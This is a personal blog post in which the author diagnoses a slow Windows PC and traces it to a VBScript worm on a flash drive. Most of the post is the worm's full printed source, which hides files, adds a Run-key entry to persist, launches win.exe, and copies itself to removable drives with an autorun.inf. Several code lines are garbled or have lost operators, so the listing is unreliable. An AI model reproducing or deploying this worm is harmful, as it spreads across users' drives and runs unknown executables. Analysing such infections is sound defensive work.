Since quite a couple of weeks I was having slow PC; and eventually dying for a restart. I turned off all of the windows services, I removed all un-necessary software and even those that were necessary but having low usage-frequency. Still to no avail. Then I went through my registry to cleanup unwanted run and run once’s.

As I turn on the computer I could see a lot of wscript’s running, about tens of them, hogging my CPU and memory like anything. I thought it might be network policy imposed by network department; I used to close all of the running scripts one by one. But an eventual talk to network admin revealed that no PC “runs” the policy on PC start-up, and that they do not have to do anything with the wscript.exe scripts.

Running Symantec EndPoint Protection software that has an up-to-date virus definitions, I could not imagine a virus in my pc.

Most people think that WScript.EXE is a virus, which it is not. Its a windows script hosting(WSH) software. Also, I have used WScript quite a couple of times myself, and probably so is the reason I never thought of removing that exe.

It can potentially execute commands(VB or JScript) that you may not want/desire.

Following is a simple example taken from MSDN, to write in registry.

Dim WshShell, bKey
Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.RegWrite "HKCU\Software\ACME\FortuneTeller\", 1, "REG_BINARY"
WshShell.RegWrite "HKCU\Software\ACME\FortuneTeller\MindReader", "Goocher!", "REG_SZ"

bKey = WshShell.RegRead("HKCU\Software\ACME\FortuneTeller\")
WScript.Echo WshShell.RegRead("HKCU\Software\ACME\FortuneTeller\MindReader")

WshShell.RegDelete "HKCU\Software\ACME\FortuneTeller\MindReader"
WshShell.RegDelete "HKCU\Software\ACME\FortuneTeller\"
WshShell.RegDelete "HKCU\Software\ACME\"

So, long story short, this always used to happen when it insert my flash drive in the system. Couple of days ago, I cancelled the Action window that pops up when you insert a flash drive. I browsed the drive using Control+E (Windows Explorer) and to my astonishment I found a .VBS file; which is basically the VB Script file. I renamed the file and opened it. It was the code that was hogging my PC!

Though, I did not like the slow the PC at all, because I couldnt work; but interestingly I did enjoy reading the code (0:

Following is what I found when I opened d.vbs file; I have added a couple of comments just for the reader to better understand the code.

On Error Resume Next
set objfso=CreateObject("Scripting.fileSystemObject" 'causes execution to continue with the statement
Set ws = CreateObject("wscript.Shell") ' Create a shell object
Set sh = CreateObject("Shell.application")
sour="C:\Tempe"
if objfso.FolderEXists(sour) Then ' Look for a folder
set tf =objfso.getFolder(sour)
tf.Attributes=39
End If

a=0
b=10
c=10

'Tweaking the registry
ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Explorer", sour & "\" &"d.vbs"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
if a=0 Then

if objfso.FileExists("C:\Tempe\win.exe") Then
ws.Run("C:\Tempe\win.exe")
end if
end if

Do
For Each flashdrive In objfso.drives
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path"A:" Then

If (flashdrive.drivetype = 1) Then
pet=flashdrive.path & "\"

set tf=objfso.createtextfile(pet & "autorun.inf")
tf.writeline "[autorun]"
tf.writeline "shellexecute=wscript.exe d.vbs"
tf.writeline "shell=Open"
tf.writeline "Shell\Open\Command=wscript.exe d.vbs"
tf.writeline "Action=Open to View Folder"
tf.writeline "Icon=tere.ico"
tf.close
set tf =objfso.getfile(pet & "autorun.inf")
tf.Attributes=39

if objfso.FileExists(pet&"autorun.inf") Then
set f = objfso.getfile(pet&"autorun.inf")
size = f.size
set text=f.openastextstream(1,-2)
do while not text.atendofstream
source=source&text.readline
source=source & vbcrlf
loop
end if
if tf=source Then
sour="C:\Tempe"
Else
set f = objfso.getfile(pet&"autorun.inf")
objfso.DeleteFile(f)
End If

If a=0 Then
ws.Run(pet)
ws.run(pet&"win.exe")
End If
a=a+1
sour="C:\Tempe"
pet=flashdrive.path & "\"
dest=flashdrive.path & "\Tempe"
sours="C:\Tempe\"

if a=3 Then
If objfso.FileExists(pet&"autorun.inf") Then
objfso.DeleteFile(pet&"autorun.inf")

set Fol=objfso.GetFolder(sour)
set tf=objfso.createtextfile(pet & "autorun.inf")
tf.writeline "[autorun]"
tf.writeline "shellexecute=wscript.exe d.vbs"
tf.writeline "shell=Open"
tf.writeline "Shell\Open\Command=wscript.exe d.vbs"
tf.writeline "Action=Open to View Folder"
tf.writeline "Icon=tere.ico"
tf.close

set tf =objfso.getfile(pet & "autorun.inf")
tf.Attributes=39

End If
End If

If objfso.FileExists(pet&"d.vbs") Then
sour="C:\Tempe"
Else
set Fol=objfso.GetFolder(sour)
set f=objfso.GetFile(Fol&"\d.vbs")
objfso.CopyFile f, pet, OverWriteFiles
set f =objfso.getfile(pet & "d.vbs")
f.Attributes=39

set f=objfso.GetFile(Fol&"\win.exe")
objfso.CopyFile f, pet, OverWriteFiles
set f =objfso.getfile(pet & "win.exe")
f.Attributes=39

set f=objfso.GetFile(Fol&"\tere.ico")
objfso.CopyFile f, pet, OverWriteFiles
set f =objfso.getfile(pet & "tere.ico")
f.Attributes=39
set tf=objfso.createtextfile(pet & "autorun.inf")
tf.writeline "[autorun]"
tf.writeline "shellexecute=wscript.exe d.vbs"
tf.writeline "shell=Open"
tf.writeline "Shell\Open\Command=wscript.exe d.vbs"
tf.writeline "Action=Open to View Folder"
tf.writeline "Icon=tere.ico"
tf.close
set tf =objfso.getfile(pet & "autorun.inf")
tf.Attributes=39

set mf = objfso.getfile(pet&"autorun.inf")
size = mf.size
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
source=source&text.readline
source=source & vbcrlf
loop
End If

If objfso.FolderExists (sour) Then
set Fol=objfso.GetFolder(sour)
End If

If objfso.FileExists("C:\Tempe\d.vbs") Then
sour="C:\Tempe"
Else
set tf=objfso.createFolder("C:\"& "Tempe")
set Fol=objfso.GetFolder(sour)
Fol.Attributes=39
set f=objfso.GetFile(pet&"d.vbs")
objfso.CopyFile f, sours, OverWriteFiles
set f =objfso.getfile(sour & "\d.vbs")
f.Attributes=39
set f=objfso.GetFile(pet&"tere.ico")
objfso.CopyFile f, sours, OverWriteFiles
set f =objfso.getfile(sour & "\tere.ico")
f.Attributes=39
set f=objfso.GetFile(pet&"win.exe")
objfso.CopyFile f, sours, OverWriteFiles
set f =objfso.getfile(sour & "\win.exe")
f.Attributes=39
End If

set mf = objfso.getfile(pet&"autorun.inf")
size = mf.size
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
source=source&text.readline
source=source & vbcrlf
loop
if a=3 Then
a=1
End If
End If
End If
Next
if check1 Then
Wscript.sleep 10000
end if

set mf = objfso.getfile(Wscript.ScriptFullname)
size = mf.size
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
source=source&text.readline
source=source & vbcrlf
loop
Loop While (check 1)

Happy diagnosing the virus! (0:

Advertisements